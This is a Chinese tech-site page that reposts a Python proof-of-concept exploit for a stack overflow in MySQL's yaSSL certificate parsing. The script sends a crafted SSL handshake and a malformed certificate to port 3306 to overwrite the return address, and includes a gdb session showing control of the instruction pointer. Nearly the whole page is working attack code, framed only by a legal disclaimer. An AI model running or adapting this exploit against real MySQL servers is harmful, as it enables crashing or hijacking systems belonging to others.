当前位置: 首页 > 工具软件 > yaSSL > 使用案例 >

mysql yassl关闭_MySQL yaSSL库证书解析栈溢出漏洞

宗政鸿志
2023-12-01

#!/usr/bin/env python

#

# Use this code at your own risk. Never run it against a production system.

#

# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES

# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF

# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR

# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES

# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN

# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF

# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

"""

Usage: mysql_overflo1.py localhost

MySQL yassl cert parsing stack overflow

Debug session on 5.5.0-m2

suse11:~ # gdb -q

(gdb) att 5542

Attaching to process 5542

Reading symbols from /var/mysql/libexec/mysqld...cdone.

...

0xffffe430 in __kernel_vsyscall ()

(gdb) c

Continuing.

Program received signal SIGSEGV, Segmentation fault.

[Switching to Thread 0xb6bbab90 (LWP 5545)]

0x41424344 in ?? ()

(gdb)

"""

import os

import getopt

import sys

import socket

import time

import telnetlib

import struct

import base64

import random

class theexploit:

def __init__(self,host):

self.host = host

self.port = 3306

def gettcpsock(self):

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

return sock

def int2berlen(self,i):

e=self.int2ber(i, signed=0)

if i <= 127:

return e

else:

l=len(e)

return chr(0x80|l) + e

def int2ber(self,i, signed=1):

encoded=''

while ((signed and (i>127 or i<-128))

or (not signed and (i>255))):

encoded=chr(i%256)+encoded

i=i>>8

encoded=chr(i%256)+encoded

return encoded

def big_endian_24(self, length):

l1 = (length & 0xff0000) >> 16;

l2 = (length & 0xff00) >> 8;

l3 = length & 0xff;

size = chr(l1) + chr(l2) + chr(l3)

return size

def attack_mysql(self):

sock = self.gettcpsock()

sock.connect((self.host, self.port))

#sock.set_timeout(30.0)

print "press any key"

sys.stdin.readline()

s=sock.recv(8000)

print s

s ="\x20\x00\x00\x01\x85\xae\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00"

s+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

s+="\x00\x00\x00\x00"

s+="\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1"

s+="\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5"

s+="\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39"

s+="\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f"

s+="\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12"

s+="\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06"

s+="\x00\x03\x02\x01\x00"

sock.sendall(s)

print "Sent SSL_CLIENT_HELLO"

sock.sendall(self.make_overflow())

print "Sent SSL_CLIENT_CERTIFICATE"

sock.close()

def run(self):

self.attack_mysql()

return 0

def make_overflow(self):

retaddr=0x41424344

cn=""

cn += "\x00"* 1062

cn+=struct.pack ("<L",retaddr)*6

#cn += "\x40" * 100

#cn += "\xcc"*100

#cn += "\x40" * 100

cert = "\x2a\x86\x00\x84" + struct.pack(">L",len(cn)) + cn

cert = "\x30\x82\x01\x01\x31\x82\x01\x01\x30\x82\x01\x01\x06\x82\x00\x02" + cert

cert ="\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00" + cert

cert = "\x30" + self.int2berlen(len(cert)) + cert

cert = "\x30" + self.int2berlen(len(cert)) + cert

cert1 = self.big_endian_24(len(cert)) + cert

certs = self.big_endian_24(len(cert1)) + cert1

handshake = "\x0b" + self.big_endian_24(len(certs)) + certs

msg = "\x16\x03\x01" + struct.pack(">H",len(handshake)) + handshake

return msg

if __name__=="__main__":

app = theexploit(sys.argv[1])

app.run()

 类似资料: